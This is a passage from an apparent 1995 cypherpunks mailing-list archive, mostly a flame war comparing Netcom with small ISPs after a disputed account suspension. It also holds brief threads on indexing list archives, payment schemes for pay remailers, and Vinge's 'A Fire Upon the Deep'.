dissatisfied customers. Big providers like Netcom don't care if someone they don't like logs onto the machine again as "guest". > Tuesday, after being up for 20+ hours and getting a couple > hours sleep, you call ... Again, sue me, this time for being > tired. Service at big providers like Netcom doesn't slack off when "the guy who owns the machine" misses his nap... > Wednesday, I was going to be into work, which you assumed I > would be, ... I decided I was going to take that day off ... ...or when "the guy who owns the machine" goes fishing... > The machine being down was not used as an excuse, but it is > hard to operate like we used to with only one user machine. ...or when "the machine" is broken. > That is 2 counts in 2 days (notified on monday, early, of > the spamming, notified on wed of the mass unsolicited > mailings). Sorry, someone had to put their foot down, and > it happened to be us. Big service providers like Netcom don't interfere with customer use of the resources they sell, except when network functionality is impacted. Even in such cases, they try to reach an understanding with the user, and terminate accounts only as a last resort. Accounts don't vanish when "the guy who owns the machine" decides to throw a tantrum. > It was innapropiate for the groups that you posted to. Big providers like Netcom don't pass editorial judgment on the content of material posted by their customers. > Sorry Carol Anne, but this is a system I administer and I > use the AUP to protect all of us accross the 'net. I am sure we will all sleep more soundly knowing that Mike Horwath and his tiny pimple of a machine on the Internet are "protecting" us. > We had talked about the winternet t-shirts and how we would > use the work you did and the monies you would receive as > payment. Big providers like Netcom don't make silly little deals with customers for T-shirts... > Well, no t-shirts have gone out and at this time, I will be > cancelling all orders for them and will redesign them and > have them produced externally to what you have done. This > is what happens when you hold something over someones head. ...or cancel those agreements out of spite when they don't get everything done their way. You know, I used to use BBS systems a great deal before large providers like Netcom began offering personal accounts with Internet access at reasonable rates. A BBS is about as far from a common carrier as one can get, and many Sysops disclaim all your rights under the ECPA, read private mail, forbid the use of PGP, decide what opinions may be expressed on various issues, and boot off any user who questions anything they do. Since the Sysop owns the machine, they are legally within their rights to act like this, and as long as there are enough users who will put up with their behavior, they can run a system. Now that Unix boxes are not much more expensive than PCs used to be, every asshole in the world who played Sysop on a BBS now envisions himself as Sysadmin of an ISP. So you have an infestation of tiny service providers, running on toy machines, that coast along for a few years until the person running them either goes bankrupt or gets bored. I certainly wouldn't subscribe to one of these services, because the management mentality and problematical service most of them provide is exactly what I came to Netcom to get away from. Quite frankly, I don't see why Carol doesn't just get a Netcom account and stop quibbling with this twit. Stop letting him waste any more of your time and let him play his administrative power games with newbies who don't know any better. My two cents. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From jonny at Synopsys.COM Fri Jan 6 16:19:51 1995 From: jonny at Synopsys.COM (Jonny Goldman) Date: Fri, 6 Jan 95 16:19:51 PST Subject: Indexing and searching (was Re: public vs. private replies) In-Reply-To: <9501062315.AA29835@deepthought.Princeton.EDU> Message-ID: <9501070020.AA01782@philo.synopsys.com> Date: Fri, 06 Jan 1995 18:15:40 EST From: "Christopher J. Tengi" You may want to take a look at glimpse and harvest. Here are some useful URLs for them: http://glimpse.cs.arizona.edu:1994/ http://harvest.cs.colorado.edu/ Both very good systems. Harvest is probably overkill. Glimpse is nice, but I don't know if it handles mail archives (unless they are one-file-per-message). > > In article <199501060807.DAA22166 at bb.hks.net>, > L. McCarthy wrote: > >Tim May writes: > >> In my opinion, having personal access > >> to past posts is several orders of magnitude more important than > >> having MIDI-MIME JPEG-II TeX players [...] > > > >It takes more disk space from one's personal quota, though (for those who > >suffer under such restrictions). :[ > > All posts to cypherpunks since June '94 are available by ftp from > ftp.hks.net:/cypherpunks/nntp/cypherpunks. They are also available > via nntp from nntp.hks.net:hks.lists.cypherpunks. > > I'd be glad to put a search engine of some sort on them, either by > Web or by mailserver, if someone can suggest a reasonable way to index > the whole lot. There used to be a WAIS index of cypherpunks on mariposa, but it doesn't seem to work now. WAIS indexing mail archives is pretty easy. - Jonny G From mpd at netcom.com Fri Jan 6 16:20:05 1995 From: mpd at netcom.com (Mike Duvos) Date: Fri, 6 Jan 95 16:20:05 PST Subject: All I did was properly crosspost! In-Reply-To: <9501062310.AB20311@eri.erinet.com> Message-ID: <199501070020.QAA03416@netcom10.netcom.com> > The discussion on alt.current-events.net-abuse seemed to indicate that the > claim of "Just 10" above is a slight understandment. The newsgroups seem to > have been hit alphabetically, and I believe the total count was in the hundreds. > > --Paul J. Ste. Marie > pstemari at well.sf.ca.us, pstemari at erinet.com The individual who posted the first hysterical message about Carol's alleged spam in a.c-e.n-a leaped to the conclusion that it was being posted to a large number of groups because one of the newsgroups posted to had a very low ordinal in the alphabetical list of all newsgroups. The message itself, which he quoted, was only cross-posted to the 10 newsgroups specified. I believe the CancelMoose threshold for an official spam is 50 newsgroups. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From cactus at hks.net Fri Jan 6 16:47:38 1995 From: cactus at hks.net (L. Todd Masco) Date: Fri, 6 Jan 95 16:47:38 PST Subject: Peter D. Lewis Message-ID: <199501070053.TAA00768@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Culled from a columbia newsgroup: >WIRED magazine now has a "Peter Lewis Prize for Bad Internet >Reporting". Check out: http://www.hotwired.com/Signal/Flux/ where >they announce the prize each week. Also read the story how Reuters >muffed up the Microsoft/Catholic Church reporting. You know it's bad when WIRED accuses you of bad reporting. - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLw3l5yoZzwIn1bdtAQHYmwGAmV97gzR8Tcl4b5iWMtRSbxUGKGFjEErS CNbc4fIyVrRnpUg55T8PSB9RktUn/I5K =OK63 -----END PGP SIGNATURE----- From wozzeck at phantom.com Fri Jan 6 17:08:34 1995 From: wozzeck at phantom.com (I'm Wozz) Date: Fri, 6 Jan 95 17:08:34 PST Subject: Files and mail In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com> Message-ID: On Fri, 6 Jan 1995, Mike Duvos wrote: > drechsau at winternet.com (Mike Horwath) carefully explains all the > reasons why is it better to have a Netcom account than a > Winternet account! > > > I was going to be in, I decided to rest instead. So sue me > > for it. > > Big providers like Netcom have many employees and many machines. > Things do not screech to a halt when "the guy who owns the > machine" takes a mental health day. :) > no instead things screech to a halt when the 1000th user gets on each client machine > > Talk about net.good.will...you stole service after it was > > suspended. > > Free service offered to the public cannot be stolen, even by > prior dissatisfied customers. Big providers like Netcom don't > care if someone they don't like logs onto the machine again as > "guest". > when she was prohibited from that service because of her actions it is. > > Tuesday, after being up for 20+ hours and getting a couple > > hours sleep, you call ... Again, sue me, this time for being > > tired. > > Service at big providers like Netcom doesn't slack off when "the > guy who owns the machine" misses his nap... > no they slack off whenever they get a chance > > Wednesday, I was going to be into work, which you assumed I > > would be, ... I decided I was going to take that day off ... > > ...or when "the guy who owns the machine" goes fishing... > ...or when 5 trillion hackers descend on the machine and eat it alive > > The machine being down was not used as an excuse, but it is > > hard to operate like we used to with only one user machine. > > ...or when "the machine" is broken. > ...or when "their network" is broken. > > That is 2 counts in 2 days (notified on monday, early, of > > the spamming, notified on wed of the mass unsolicited > > mailings). Sorry, someone had to put their foot down, and > > it happened to be us. > > Big service providers like Netcom don't interfere with customer > use of the resources they sell, except when network functionality > is impacted. Even in such cases, they try to reach an > understanding with the user, and terminate accounts only as a > last resort. Accounts don't vanish when "the guy who owns the > machine" decides to throw a tantrum. > if a user on netcom violates the AUP, their account would be terminated...if those were the terms of the AUP. It just so happens the AUP of winternet allows for this situation. its a bit far fetched to call HIS reaction a tantrum.... If anyone's screaming for mommy its whats-her-name.... > > Sorry Carol Anne, but this is a system I administer and I > > use the AUP to protect all of us accross the 'net. > > I am sure we will all sleep more soundly knowing that Mike > Horwath and his tiny pimple of a machine on the Internet are > "protecting" us. big is better i guess.... > > > We had talked about the winternet t-shirts and how we would > > use the work you did and the monies you would receive as > > payment. > > Big providers like Netcom don't make silly little deals with > customers for T-shirts... > Big providers like Netcom don't have a 'community' to speak of. > > Well, no t-shirts have gone out and at this time, I will be > > cancelling all orders for them and will redesign them and > > have them produced externally to what you have done. This > > is what happens when you hold something over someones head. > > ...or cancel those agreements out of spite when they don't get > everything done their way. uhmm, sounds like the deal was cancelled because she didn't deliver.,..not out of spite > > You know, I used to use BBS systems a great deal before large > providers like Netcom began offering personal accounts with > Internet access at reasonable rates. A BBS is about as far from > a common carrier as one can get, and many Sysops disclaim all > your rights under the ECPA, read private mail, forbid the use of > PGP, decide what opinions may be expressed on various issues, and > boot off any user who questions anything they do. Since the > Sysop owns the machine, they are legally within their rights to > act like this, and as long as there are enough users who will put > up with their behavior, they can run a system. HAhahaha...if you had any idea what you were talking about, you would realize you are totally off base. Winternet is HARDLY a 'bbs'. Its a regional internet service....much as netcom was before they flooded every city with dialups. Any professional knows better than to read private mail...and if this is so...then they aren't worthy of having a site to run as for PGP, this is an individual thing....I'm sure mike has no such objections...i know here at MindVox we don't...in fact, we installed it for the users Who owns netcom's machines? > > Now that Unix boxes are not much more expensive than PCs used to > be, every asshole in the world who played Sysop on a BBS now > envisions himself as Sysadmin of an ISP. So you have an > infestation of tiny service providers, running on toy machines, > that coast along for a few years until the person running them > either goes bankrupt or gets bored. I certainly wouldn't > subscribe to one of these services, because the management > mentality and problematical service most of them provide is > exactly what I came to Netcom to get away from. > Once again, you speaketh from your ass.... Netcom is an abomination.....it is the only one of its kind (not counting delphi etc, since they were conceived under differnent systems) Netcom is a Winternet which has grown out of control. They suck network services off others (irc as one example) and don't take responsibilty for the HUGE number of idiots on their service who maliciously hack anything they can reach....its totally without personality...AND....its slower than molasses...the management is out of touch with the users and they are so overloaded with trouble reports, they don't know what to do with them. > Quite frankly, I don't see why Carol doesn't just get a Netcom > account and stop quibbling with this twit. Stop letting him > waste any more of your time and let him play his administrative > power games with newbies who don't know any better. Yes....join them carol join them.... join them.... join them.... be like us.... be like us.... be like us.... we will care for your every need.... we will care for your every need.... we will care for your every need.... look deep into my eyes.... look deep into my eyes.... look deep into my eyes.... This has got to be one of the largest loads of crap I've seen tossed on this list in the year and a half i've lurked on it. I'd love to see a response to this...please! oh...btw...i don't have ANY connection to winternet, other than knowing MANY satisfied customers, and having heard alot about them, as a sysadmin for a site in much the same situation. , /\_-\(:::::::::)/\_-\ matthew e. cable - systems administrator . . <((_)) MindVox ((_))> phantom access technologies inc . \- \/(:::::::::)\- \/ wozzeck at phantom.com From nobody at replay.com Fri Jan 6 17:26:41 1995 From: nobody at replay.com (Name withheld on request) Date: Fri, 6 Jan 95 17:26:41 PST Subject: No Subject In-Reply-To: <199501062336.PAA12592@homer.spry.com> Message-ID: <199501070127.AA00746@xs1.xs4all.nl> > Think I'll go make some popcorn and sit back to watch the fireworks some more. (giggle) (giggle) (giggle) (giggle) Me, too. Love always, Carole Anne Buttock P.S. Someone with a clue: please help me get a life. Only 10 cross posts!!! From roy at cybrspc.mn.org Fri Jan 6 18:07:47 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Fri, 6 Jan 95 18:07:47 PST Subject: Remailer Abuse In-Reply-To: Message-ID: <950106.173231.9X3.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, jrochkin at cs.oberlin.edu writes: > At 3:12 PM 01/06/95, Russell Nelson wrote: >>Why? Why wouldn't the FV remailers use settlements? At the end of >>the month, everyone settles accounts in re who gets what fraction of >>what. No logs are needed other than counters. > > Oh, you're suggesting that I'd only actually pay the first remailer on my > chain, and at the end of the month he'd pay some of the money I (and > others) paid him to all of the other remailers his transacted with over the > month? I hadn't thought of that, but now that I do, I can see several > problems arising. This might not be as much of a problem as you think. Given that there will likely be a mixture of free and pay remailers, and that a given message may chain through one or more of either type, why not place the stamp for each pay remailer inside the encrypted sub-packet which that mailer will receive? Think of each remailer as an independant post office. For each pay remailer, you need one stamp. Ideally, each stamp would be a bit less expensive, but since remailers don't need to share their revenue, that shouldn't be much problem. An intelligent chainer (Chain++, maybe?) could keep track of your postage and put the stamps in the proper inner envelopes. This would work best if all the pay remailers accepted a common brand of stamp. - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP public key available by mail echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org These are, of course, my opinions (and my machines) -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLw3VrBvikii9febJAQFozwQAkYUBp9Uc5Lbmc4udL7hwTgBY9I+yfKdy wvW5xl4TeTeJLAS95yHOyiEKP/nVsjfknr4gx1mOrFZYOxkNRJa78YeQ8tDAVq7Y S1UQrYqHJAoi/AKdypufIaeu8iF/1pVbYLDdIbbQm3bxlUZHwciYJUvnneRjFbhA BJB+ruqzEMs= =CGFS -----END PGP SIGNATURE----- From jamesd at netcom.com Fri Jan 6 18:12:40 1995 From: jamesd at netcom.com (James A. Donald) Date: Fri, 6 Jan 95 18:12:40 PST Subject: Files and mail In-Reply-To: <199501070010.QAA02210@netcom10.netcom.com> Message-ID: On Fri, 6 Jan 1995, Mike Duvos wrote: > > drechsau at winternet.com (Mike Horwath) carefully explains all the > reasons why is it better to have a Netcom account than a > Winternet account! > > > I was going to be in, I decided to rest instead. So sue me > > for it. (Long hilarious list of Mike Horwaths's totally unprofessional behavior deleted To save bandwidth, just read it twice, or better still three times.) > [Netcom] accounts don't vanish when "the guy who owns the > machine" decides to throw a tantrum. > > [...] > A big problem with Netcom is it that it has no web server, and its ftp server is totally overwhelmed. I use nw.com for my web pages and netcom for everything else. Big bandwidth webservice at reasonable rates Does anyone have a better suggestion? I have been shopping around for a reasonably priced 28KB SLIP connection. Have not found one yet. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From mpd at netcom.com Fri Jan 6 18:12:43 1995 From: mpd at netcom.com (Mike Duvos) Date: Fri, 6 Jan 95 18:12:43 PST Subject: Files and mail In-Reply-To: Message-ID: <199501070212.SAA19162@netcom3.netcom.com> "I'm Wozz" writes: [miscellaneous Netcom-honking elided] > It just so happens the AUP of winternet allows for this > situation. Right. And a small service provider can make any "terms of service agreement" his or her little heart desires. Just like the owner of a two line BBS. With big service providers, such things tend to be done in a somewhat more business-like fashion. > its a bit far fetched to call HIS reaction a tantrum.... If > anyone's screaming for mommy its whats-her-name.... Well, if I posted a message to 10 newsgroups and some bozo posted a message to a.c-e.n-a falsely implying that it was the beginning of some sort of massive spam, I would certainly not be pleased. If Netcom, after receiving some small amount of flamage on the subject, summarily removed access to my account and made themselves unavailable for several days when I tried to contact them to discuss the matter, and then tossed me off with a flippant "so sue me" when I protested, I would be even less pleased. Fortunately, I can't imagine Netcom even caring about a 10 newsgroup cross-post. > big is better i guess.... In the case of Internet Service Providers, big is definitely better. There are simply economies of scale which are not realized with smaller operations. Netcom has had some problems, but almost all of them were growth related. None of them were intrinsic to the systems and network itself. > Winternet is HARDLY a 'bbs'. Its a regional internet > service....much as netcom was before they flooded every > city with dialups. Read again, this time for comprehension. I did not say Winternet was a BBS. Merely that smaller ISPs have many of the undesirable characteristics found in BBS systems. > Any professional knows better than to read private > mail...and if this is so...then they aren't worthy of having > a site to run For legal purposes, most BBS systems declare that for the purposes of the ECPA, there is no such thing as private mail on their system. The Sysop is then free to read anything he wishes to. This policy is clearly stated in the user agreements of almost all BBS systems offering access to the public. > as for PGP, this is an individual thing....I'm sure mike > has no such objections...i know here at MindVox we > don't...in fact, we installed it for the users Many BBS Sysops forbid PGP and kick users off their systems who use it. They cite fears of encrypted illegal porn and credit card numbers passing through their systems, and potential legal liability. > Netcom is an abomination.....it is the only one of its kind > (not counting delphi etc, since they were conceived under > differnent systems) Netcom is the fastest growing and leading Internet Service Provider. Their ability to attract new customers is limited only by the rate at which they are able to increase capacity. Their respect for freedom of expression is absolute and they do not meddle in their customers' affairs. Their prices are reasonable and their user agreement is fair. Works for me. :) > They suck network services off others (irc as one example) > and don't take responsibilty for the HUGE number of idiots > on their service who maliciously hack anything they can > reach....its totally without personality...AND....its slower > than molasses...the management is out of touch with the > users and they are so overloaded with trouble reports, they > don't know what to do with them. Perhaps an exaggerated description of Netcom a few months ago, but certainly not the current state of affairs. I always get a line when I dial in, response time is reasonable, disk is abundant, and almost all software is available. Speed of network connections to other sites is quite acceptable. > This has got to be one of the largest loads of crap I've > seen tossed on this list in the year and a half i've lurked > on it. Everyone is certainly entitled to an opinion, which, in the words of Robert Blake, is one of the two things all humans have. :) > oh...btw...i don't have ANY connection to winternet, other > than knowing MANY satisfied customers, and having heard > alot about them, as a sysadmin for a site in much the same > situation. The number of satisfied customers is not the measure of a site, any more than the number of people still alive is the measure of a disease. Netcom works with the reliability of the phone company. It is always there, almost always up, and is redundant enough that when something breaks, it is still usable. I pay my $19.50 a month and I get unlimited everything. I'm happy. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From jamesd at netcom.com Fri Jan 6 18:26:04 1995 From: jamesd at netcom.com (James A. Donald) Date: Fri, 6 Jan 95 18:26:04 PST Subject: Files and mail In-Reply-To: Message-ID: On Fri, 6 Jan 1995, I'm Wozz wrote: > > > > Big providers like Netcom have many employees and many machines. > > Things do not screech to a halt when "the guy who owns the > > machine" takes a mental health day. :) > > > > no instead things screech to a halt when the 1000th user gets on each > client machine When Netcom slows down, this is not because the asshole in charge is being an asshole. He may well be an asshole, but the size of netcom protects me from having to discover this. This is good for my mental health. > > I'd love to see a response to this...please! You are totally full of shit. Mike Horwath was arrogant and unprofessional. The problems you describe with Netcoms service are entirely accurate. I am looking for better solution. Submitting to the authority of an arrogant and incompetent fool does not seem like a good solution. He is plainly a fool, because if I had acted as he has acted, I would certainly not post this all over the place. Until he posted, I had assumed that Carol was having a hissy fit, that she was premenstrual or something. Now I see why she is upset. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From eric at remailer.net Fri Jan 6 18:31:50 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 6 Jan 95 18:31:50 PST Subject: for-pay remailers and FV In-Reply-To: Message-ID: <199501070231.SAA20999@largo.remailer.net> This whole fracas between blind-sig money and FV money is a symptom of the confusion between clearing and settlement. Roughly speaking, clearing is when authorization moves (i.e. a liability is created), and settlement is when money moves (i.e. when that liability is discharged). Clearing should always happen at or before settlement. In order to do on-line digital postage, you need clearing to happen at the point of remailing. Settlement can happen at some later time. Settlement need not be in real money. The liability of other settlement facilities can be used. This is in fact how central banking works. Only the central bank moves "actual" funds; everyone else moves liabilities around. To wit, a remailer consortium would do best to issue a local banknote usable only by themselves and have customers settle with the consortium issuer, rather than any member of the consortium itself. If the consortium issuer were to use blind sigs, the consortium members wouldn't be able to ascertain who paid. The mechanism for settlement could be credit cards directly, mailed in checks, even FV. The preferences of the consortium members for issues of timeliness of settlement, reversibility, loss sharing, etc. would decide the actual choice of settlement mechanism. Eric From jamesd at netcom.com Fri Jan 6 18:44:27 1995 From: jamesd at netcom.com (James A. Donald) Date: Fri, 6 Jan 95 18:44:27 PST Subject: for-pay remailers and FV In-Reply-To: <199501070231.SAA20999@largo.remailer.net> Message-ID: On Fri, 6 Jan 1995, Eric Hughes wrote: > This whole fracas between blind-sig money and FV money is a symptom of > the confusion between clearing and settlement. It is nothing to do with that confusion. > To wit, a remailer consortium would do best to issue a local banknote > usable only by themselves and have customers settle with the > consortium issuer, rather than any member of the consortium itself. > If the consortium issuer were to use blind sigs, the consortium > members wouldn't be able to ascertain who paid. If they could use blind sigs they would not need a consortium. The customer would just put the postage inside the envelope, and each for-pay remailer would just peel of an envelope layer, and use the postage that the user provided for it. Chaumian money solves the problems we are discussing. The problem that we are discussing is how to solve them without using Chaumian money. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From wozzeck at phantom.com Fri Jan 6 19:07:38 1995 From: wozzeck at phantom.com (I'm Wozz) Date: Fri, 6 Jan 95 19:07:38 PST Subject: Files and mail In-Reply-To: Message-ID: On Fri, 6 Jan 1995, James A. Donald wrote: > On Fri, 6 Jan 1995, I'm Wozz wrote: > > > > > > Big providers like Netcom have many employees and many machines. > > > Things do not screech to a halt when "the guy who owns the > > > machine" takes a mental health day. :) > > > > > > > no instead things screech to a halt when the 1000th user gets on each > > client machine > > When Netcom slows down, this is not because the asshole in charge > is being an asshole. I'd hardly call taking a day off being an asshole. Is he supposed to staff the thing 24 hours a day 7 days a week? No...its a small operation, that cannot be expected. > > He may well be an asshole, but the size of netcom protects > me from having to discover this. > and you like the fact that you have NO idea who's running the place. > This is good for my mental health. > > > > > I'd love to see a response to this...please! > > You are totally full of shit. and why is this? there is no support for this statement... > > Mike Horwath was arrogant and unprofessional. > hardly...after the fit this woman threw. CC'ing his private mail and interactions with her to COMPLETELY unrelated places .... such as cypherpunks, nicholas negreponte of all people, wired, etc, etc, etc as i understand the situation, the main contention here is that she was trying to sell space on her web pages.....on winternet's machines....without winternet's permission. How would netcom react to such a situation (oh thats right....you're not allowed to have web pages) How about a similar situation, such as you selling the time you don't use on your account to a friend and pocketing the money > The problems you describe with Netcoms service are entirely > accurate. I am looking for better solution. Submitting to > the authority of an arrogant and incompetent fool does not > seem like a good solution. > no...instead, submit to the authority of 100 or so ANONYMOUS arrogant incompetent fools > He is plainly a fool, because if I had acted as he has acted, > I would certainly not post this all over the place. > he's not posting this all over the place....Carol had a fit and he chose to respond. I'm afraid the baby here is Carol , + . /\_-\ ==================---------------------- . ` . <((_))> ==============-------------------- ` x . \- \/ ===========------------------ , /\_-\(:::::::::)/\_-\ matthew e. cable - systems administrator . . <((_)) MindVox ((_))> phantom access technologies inc . \- \/(:::::::::)\- \/ wozzeck at phantom.com + ` /\_-\ ===========------------------ . , * ' <((_))> ==============-------------------- + x \- \/ ==================---------------------- From weidai at eskimo.com Fri Jan 6 19:12:01 1995 From: weidai at eskimo.com (Wei Dai) Date: Fri, 6 Jan 95 19:12:01 PST Subject: A Fire Upon the Deep Message-ID: In article <199501052231.OAA11745 at netcom5.netcom.com>, tcmay at netcom.com (Timothy C. May) says: >Finally, his Hugo-winning novel, "A Fire Upon the Deep," has some >casual mentions of crypto, including the odd speculation that those in >the know in the distant future don't really trust public key crypto. This is quite sensible given that in the Zone universe, you may have no idea how much computing power your enemies have, so no cryptography that is only computationally secure can really be trusted. _A Fire Upon the Deep_ also describes how anarchy might work on a galactic scale. For example, Vinge seems to think that arbitration organizations would be very important in such an anarchy and would acquire military characteristics. Issues of trust and reputation are also treated implicitly. There was some recent talk about network agent technology on this list. Vinge mentions almost in passing how an entire planet (or maybe planets) was taken over by an "intelligent net packet". Makes me rather nervous about things like Magic Cap... One more thing that's marginally related to cypherpunks (hey I really like this book so I'll take any chance I can to talk about it ;-) is the idea that the efficiency of distributed computation (and distributed intelligence) depends on high bandwidth and low latency of the communication medium. Since anonymity seems to have rather high costs in terms of bandwidth and latency (compare anonymous e-mail with internet video conferencing or even with normal e-mail), this implies that an organization of anonymous agents will not work as efficiently as a similar orginzation whose members are not concerned about anonymity. Wei Dai PGP encrypted mail welcome. From wozzeck at phantom.com Fri Jan 6 19:20:46 1995 From: wozzeck at phantom.com (I'm Wozz) Date: Fri, 6 Jan 95 19:20:46 PST Subject: Files and mail In-Reply-To: <199501070212.SAA19162@netcom3.netcom.com> Message-ID: On Fri, 6 Jan 1995, Mike Duvos wrote: > "I'm Wozz" writes: > > [miscellaneous Netcom-honking elided] > > > It just so happens the AUP of winternet allows for this > > situation. > > Right. And a small service provider can make any "terms of > service agreement" his or her little heart desires. Just like > the owner of a two line BBS. With big service providers, such > things tend to be done in a somewhat more business-like fashion. hahah....netcom can make up anything they want to. You do of course, read these agreements before you get on...don't you... Here's a simple solution...don't get on a systems who's AUP you disagree with. You assertion that simply because a company is not netcom's size, that its unprofessional and incompetent is rediculous. > > > its a bit far fetched to call HIS reaction a tantrum.... If > > anyone's screaming for mommy its whats-her-name.... > > Well, if I posted a message to 10 newsgroups and some bozo posted > a message to a.c-e.n-a falsely implying that it was the beginning > of some sort of massive spam, I would certainly not be pleased. > If Netcom, after receiving some small amount of flamage on the > subject, summarily removed access to my account and made > themselves unavailable for several days when I tried to contact > them to discuss the matter, and then tossed me off with a > flippant "so sue me" when I protested, I would be even less > pleased. Fortunately, I can't imagine Netcom even caring about a > 10 newsgroup cross-post. > right....because Netcom is FILLED with assholes....those that crosspost to 10 groups are overlooked > > big is better i guess.... > > In the case of Internet Service Providers, big is definitely > better. There are simply economies of scale which are not > realized with smaller operations. Netcom has had some problems, > but almost all of them were growth related. None of them were > intrinsic to the systems and network itself. > so...AOL is better than netcom? at least they have an irc server. and ALL of netcom's problems are related to the systems and network.... they didn't plan their expansion correctly....and as a result...are feeling it now. > > Winternet is HARDLY a 'bbs'. Its a regional internet > > service....much as netcom was before they flooded every > > city with dialups. > > Read again, this time for comprehension. I did not say Winternet > was a BBS. Merely that smaller ISPs have many of the undesirable > characteristics found in BBS systems. > and Netcom has many of the undesirable characteristics found in big systems like Prodigy and Compuserve... if you honestly find this attractive.....well, enjoy > > Any professional knows better than to read private > > mail...and if this is so...then they aren't worthy of having > > a site to run > > For legal purposes, most BBS systems declare that for the > purposes of the ECPA, there is no such thing as private mail on > their system. The Sysop is then free to read anything he wishes > to. This policy is clearly stated in the user agreements of > almost all BBS systems offering access to the public. > well of course.....Netcom will read your mail too if you are accused of hacking. The fact is....the chances of someone reading your mail on Netcom are about 100 times higher than on a smaller system....simply becuase the place is so overridden with root wielding hackers who have nothing better to do than torment others.... > > as for PGP, this is an individual thing....I'm sure mike > > has no such objections...i know here at MindVox we > > don't...in fact, we installed it for the users > > Many BBS Sysops forbid PGP and kick users off their systems who > use it. They cite fears of encrypted illegal porn and credit > card numbers passing through their systems, and potential legal > liability. > well......once again.....shop before you buy. You can't make such blanket assertations, because they simply aren't true. > > Netcom is an abomination.....it is the only one of its kind > > (not counting delphi etc, since they were conceived under > > differnent systems) > > Netcom is the fastest growing and leading Internet Service > Provider. Their ability to attract new customers is limited only > by the rate at which they are able to increase capacity. Their > respect for freedom of expression is absolute and they do not > meddle in their customers' affairs. Their prices are reasonable > and their user agreement is fair. Works for me. :) > Netcom is also the LEADING source of trouble for the rest of the network because of the way they handle their user population. They can't keep up with all their problems. This seems to translate to you as - "They respect me and don't bother me" THe fact is....they don't even know who the hell you are. And....being a matter of scale, as several pointed out... netcom is about 100 times the size of winternet....(approximation)... thus...lets multiply everything by 100, profits, users, problems, etc, etc If one of their user's posted (10x100) 1000 MAKE.MONEY.FAST posts to 1000 different groups.....you can bet that person wouldn't have their account the next day. > > They suck network services off others (irc as one example) > > and don't take responsibilty for the HUGE number of idiots > > on their service who maliciously hack anything they can > > reach....its totally without personality...AND....its slower > > than molasses...the management is out of touch with the > > users and they are so overloaded with trouble reports, they > > don't know what to do with them. > > Perhaps an exaggerated description of Netcom a few months ago, > but certainly not the current state of affairs. I always get a > line when I dial in, response time is reasonable, disk is > abundant, and almost all software is available. Speed of network > connections to other sites is quite acceptable. > this is THEIR network..... there is ANOTHER network out there....its called...the Internet. I've had MANY users at my site connecting from netcom, and insisting that our T1 is overloaded because of the chunky responses they are getting... well, guess what. As soon as they tried from somewhere else....their problems dissapeared. They contribute very little to the Internet .... and that which they do is overshadowed by the harm many of their more immature users cause > > > oh...btw...i don't have ANY connection to winternet, other > > than knowing MANY satisfied customers, and having heard > > alot about them, as a sysadmin for a site in much the same > > situation. > > The number of satisfied customers is not the measure of a site, > any more than the number of people still alive is the measure of > a disease. its not? then your opinion doesn't count...right? i mean...you're just a satisfied user > > Netcom works with the reliability of the phone company. It is > always there, almost always up, and is redundant enough that when > something breaks, it is still usable. I pay my $19.50 a month > and I get unlimited everything. I'm happy. > If you call netcom usable...you've obviously NEVER tried another ISP...or had several VERY bad experiences with the few you've tried. I urge you to give the whole situation another look. , + . /\_-\ ==================---------------------- . ` . <((_))> ==============-------------------- ` x . \- \/ ===========------------------ , /\_-\(:::::::::)/\_-\ matthew e. cable - systems administrator . . <((_)) MindVox ((_))> phantom access technologies inc . \- \/(:::::::::)\- \/ wozzeck at phantom.com + ` /\_-\ ===========------------------ . , * ' <((_))> ==============-------------------- + x \- \/ ==================---------------------- From wozzeck at phantom.com Fri Jan 6 19:22:52 1995 From: wozzeck at phantom.com (I'm Wozz) Date: Fri, 6 Jan 95 19:22:52 PST Subject: Netcom Message-ID: Oh yes....and how can we forget... for all its superiority....it seems to have dropped SLIP/PPP because that made them have to deal with the customers too much. Makes you feel all loved eh? , + . /\_-\ ==================---------------------- . ` . <((_))> ==============-------------------- ` x . \- \/ ===========------------------ , /\_-\(:::::::::)/\_-\ matthew e. cable - systems administrator . . <((_)) MindVox ((_))> phantom access technologies inc . \- \/(:::::::::)\- \/ wozzeck at phantom.com + ` /\_-\ ===========------------------ . , * ' <((_))> ==============-------------------- + x \- \/ ==================---------------------- From nesta at nesta.pr.mcs.net Fri Jan 6 19:32:02 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Fri, 6 Jan 95 19:32:02 PST Subject: A Fire Upon the Deep In-Reply-To: Message-ID: On Fri, 6 Jan 1995, Wei Dai wrote: > In article <199501052231.OAA11745 at netcom5.netcom.com>, tcmay at netcom.com > > There was some recent talk about network agent technology on this list. > Vinge mentions almost in passing how an entire planet (or maybe planets) > was taken over by an "intelligent net packet". Makes me rather nervous > about things like Magic Cap... > does anynoe have any information about intelligent agents? I mean I know about filter and stuff, but they arent intelligent agents. I assume one would be something like the WWW worm and other searching scripts that have a database of information to cross-reference their finds and decide what to send back to you. the WWWWorm is a good centralized illustration of this, with a searchable index of HTML 